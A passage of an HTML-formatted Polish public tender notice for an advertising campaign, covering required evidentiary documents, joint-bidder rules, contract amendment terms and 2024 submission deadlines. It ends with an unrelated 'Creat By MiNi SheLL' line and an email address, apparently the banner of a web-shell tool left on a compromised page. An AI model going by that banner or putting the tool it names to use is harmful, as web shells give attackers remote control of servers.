warunków udziału w postępowaniu Zamawiający, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia następujących podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>a)	w celu wykazania minimalnych zdolności, określonych w Rozdziale VIII ust. 2 lit. a SWZ, wezwany Wykonawca zobowiązany jest do złożenia sporządzonego wg załącznika nr 5 do SWZ Wykazu usług wykonanych lub wykonywanych (w przypadku świadczeń okresowych lub ciągłych) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane należycie oraz dowodów określających, czy usługi te zostały wykonane należycie. Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane lub są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. Wykonawca nie jest zobowiązany do przedłożenia dokumentów, które dotyczyłyby zamówień wykonanych na rzecz Zamawiającego. W przypadku usług nadal wykonywanych (świadczeń okresowych lub ciągłych) referencje lub inne dokumenty potwierdzające ich należyte wykonanie powinny być wystawione w okresie ostatnich trzech miesięcy.<br/>b)	w celu wykazania minimalnych zdolności, określonych w Rozdziale VIII ust. 2 lit. b SWZ, wezwany Wykonawca zobowiązany jest do wskazania osoby skierowanej przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat jej kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia publicznego, a także zakresu wykonywanych czynności oraz informacją o podstawie dysponowania tą osobą. Wzór wykazu stanowi załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia następujących przedmiotowych środków dowodowych:<br/>a) koncepcja kampanii reklamowej, z wyszczególnieniem sposobu wykorzystania obligatoryjnych elementów dotarcia do<br/>odbiorców (pkt. II b, i-iv załącznika nr 1 do SWZ), wraz z orientacyjnym harmonogramem publikacji treści w mediach /<br/>Internecie / ekspozycji materiałów reklamy outdoorowej,<br/>b) opis proponowanych gadżetów reklamowych zgodnie z pkt. II b, v załącznika nr 1 do SWZ; możliwość dołączenia grafik,<br/>zdjęć obrazujących propozycję gadżetów,<br/>c) opis w jaki sposób osiągnięte zostaną założenia dot. zasięgu kampanii. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający, stosownie do treści art. 107 ustawy Pzp przewiduje wezwanie do uzupełnienia przedmiotowych środków<br/>dowodowych na zasadach określonych w ww. przepisie ustawy. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>a) formularz ofertowy – wzór formularza stanowi załącznik nr 2 do SWZ;<br/>b) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>c) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie Zamówienia - dotyczy Ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie Zamówienia;<br/>d) oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz o spełnianiu warunków udziału w<br/>postępowaniu - wzór oświadczenia o niepodleganiu wykluczeniu stanowi załącznik nr 3 do SWZ, (oświadczenie dotyczące<br/>podmiotu trzeciego zostało zawarte w załączniku nr 3a do SWZ);<br/>e) zobowiązanie, o którym mowa w Rozdziale XI ust. 2 SWZ;<br/>f) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania;<br/>g) przedmiotowe środki dowodowe, o których mowa w Rozdziale I ust. 4 SWZ;<br/>h) koncepcja kreatywna kampanii - wg wzoru stanowiącego załącznik nr 7 do SWZ.<br/>d) portfolio dostarczone w wersji elektronicznej (w formacie PDF), wraz z linkami do materiałów video lub materiałami video<br/>dostarczonymi na nośniku USB; portfolio musi prezentować dotychczasowe realizacje Wykonawcy, takie jak hasło<br/>reklamowe oraz elementy zawarte w punkcie 2, I załącznika nr 1 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>2. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 1, powinno potwierdzać, że stosunek łączący<br/>Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>3. W odniesieniu do warunków dotyczących doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są<br/>wymagane. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które usługi wykonają ci poszczególni Wykonawcy.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Forma i sposób złożenia pełnomocnictwa została wskazana w pkt 9.<br/>5. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby jest umocowana do jego reprezentowania, Zamawiający żąda od<br/>Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych<br/>dokumentów.<br/>6. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 5 jeżeli Zamawiający może je uzyskać<br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów np. w treści Formularza ofertowego.<br/>7. Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotu<br/>udostępniającego zasoby działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których<br/>mowa w pkt 5, Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy.<br/>8. Jeżeli Wykonawca nie złoży wymaganych pełnomocnictw albo złożył wadliwe pełnomocnictwa, Zamawiający wezwie do<br/>ich złożenia w terminie przez siebie wskazanym, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo<br/>konieczne byłoby unieważnienie postępowania.<br/>9. Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, o których mowa w SWZ, składa się w formie<br/>elektronicznej w zakresie i w sposób określony w przepisach wydanych na podstawie art. 70 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Poza przypadkami określonymi w art. 455 ust. 1 i 2 ustawy Pzp Zamawiający przewiduje następujące możliwości<br/>dokonania zmian umowy oraz określa warunki takiej zmiany w przypadku:<br/>1) wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w tym siły wyższej, uniemożliwiających realizację umowy na warunkach w niej określonych, bez możliwości uniknięcia powyższych okoliczności<br/>lub zdarzeń, jaki i uniknięcia lub likwidacji ich skutków. W takim przypadku strony mogą przesunąć termin wykonania<br/>przedmiotu zamówienia/jego części lub zmienić takie elementy umowy, na które powyższe okoliczności mają wpływ.<br/>Powyższa zmiana nie może skutkować wykroczeniem poza określenie przedmiotu zamówienia zawarte w SWZ. Siła wyższa<br/>oznacza wydarzenia nieprzewidywalne i poza kontrolą Stron niniejszej umowy, występujące po podpisaniu umowy, a<br/>powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,<br/>2) jeżeli niedotrzymanie terminu wykonania przedmiotu umowy stanowi konsekwencję niedopełnienia przez Zamawiającego<br/>jego obowiązków wynikających z zawartej umowy,<br/>3) uzasadnionej celami zamówienia zmiany harmonogramu działań i koncepcji kampanii - powyższe może powodować<br/>zmianę terminu realizacji zamówienia jak i zmianę terminów na wykonanie poszczególnych elementów wchodzących w<br/>skład przedmiotu umowy;<br/>4) Zamawiający przewiduje możliwość wprowadzenia zmian w Harmonogramie, w zakresie elementów wchodzących w<br/>skład przedmiotu umowy polegający na zmianie poszczególnych elementów poprzez zwiększenie lub zmniejszenie ich<br/>ilości; powyższa zmiana może prowadzić do zmiany wysokości wynagrodzenia Wykonawcy, które będzie obliczane z<br/>zastosowaniem stawek jednostkowych wskazanych w treści oferty Wykonawcy;<br/>5) Zamawiający przewiduje możliwość wprowadzenia zmian w Harmonogramie, w zakresie terminów realizacji<br/>poszczególnych elementów przedmiotu zamówienia, jeśli na konieczność dokonania tych zmian będzie miał wpływ termin<br/>rozstrzygnięcia postępowania i zawarcia umowy w sprawie zamówienia publicznego; wówczas Strony dokonają zmian w<br/>terminach cząstkowych w zakresie niezbędnym do zapewnienia prawidłowego wykonania zamówienia;<br/>6) konieczności wprowadzenia zmian będących następstwem zmian wytycznych lub zaleceń instytucji, która przyznała<br/>środki na sfinansowanie zamówienia, dopuszcza się zmiany w zakresie niezbędnym dla spełnienia wymogów zmienionych<br/>wytycznych i zaleceń,<br/>7) zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy,<br/>8) wystąpienia zmiany obowiązującej stawki podatku od towarów i usług (VAT); w takim wypadku zmianie ulegnie wyłącznie<br/>kwota podatku VAT, a wartość netto wynagrodzenia pozostanie bez zmian.<br/>2. Strona umowy mająca interes w dokonaniu zmiany wnioskuje na piśmie do drugiej Strony o dokonanie zmiany,<br/>przekazując wraz z wnioskiem szczegółowe uzasadnienie dla wprowadzenia zmiany. Uzasadnienie, o którym mowa w<br/>zdaniu poprzednim zawiera w szczególności: podstawę prawną dopuszczalności zmiany, opis okoliczności faktycznych i/lub<br/>prawnych skutkujących koniecznością zmiany, zakres wnioskowanych zmian, proponowany termin obowiązywania zmian,<br/>wpływ zmiany na wynagrodzenie wykonawcy i kary umowne, o ile występuje.<br/>3. W zakresie zmian w koncepcji kampanii lub harmonogramie Wykonawca zobowiązany jest uwzględnić wnioski<br/>Zamawiającego po przedstawieniu mu przewidywanych konsekwencji wnioskowanych zamian, chyba że Zamawiający<br/>wycofa wniosek.<br/>4. Wszelkie zmiany postanowień Umowy następują w drodze Aneksów zawieranych pod rygorem nieważności w formie<br/>pisemnej, chyba że umowa stanowi inaczej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kpfp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-24 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-25</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com